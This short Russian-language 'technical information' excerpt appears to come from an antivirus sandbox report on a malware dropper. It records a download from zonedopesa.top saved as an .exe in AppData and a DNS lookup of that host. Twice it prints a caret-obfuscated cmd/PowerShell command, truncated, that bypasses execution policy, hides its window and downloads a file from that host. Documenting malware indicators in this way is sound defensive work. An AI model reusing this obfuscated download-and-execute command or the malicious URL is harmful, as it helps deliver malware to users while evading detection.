Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oWERS^HE^LL.^e^Xe^ -^eXECUt^ioNpolICy^ B^YPA^Ss ^-^nOpRoFILE ^-Wi^nDOwsT^Y^L^E HI^D^Den^ (^ne^W-OBj^eCt ^S^YsT^em^.n^ET.w^EbCL^iEN^t).^D^o^WNLO^AdFIl^e(^'http://www.zonedopesa....
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "P^oWERS^HE^LL.^e^Xe^ -^eXECUt^ioNpolICy^ B^YPA^Ss ^-^nOpRoFILE ^-Wi^nDOwsT^Y^L^E HI^D^Den^ (^ne^W-OBj^eCt ^S^YsT^em^.n^ET.w^EbCL^iEN^t).^D^o^WNLO^AdFIl^e(^'http://www.zonedopesa....' (со скрытым окном)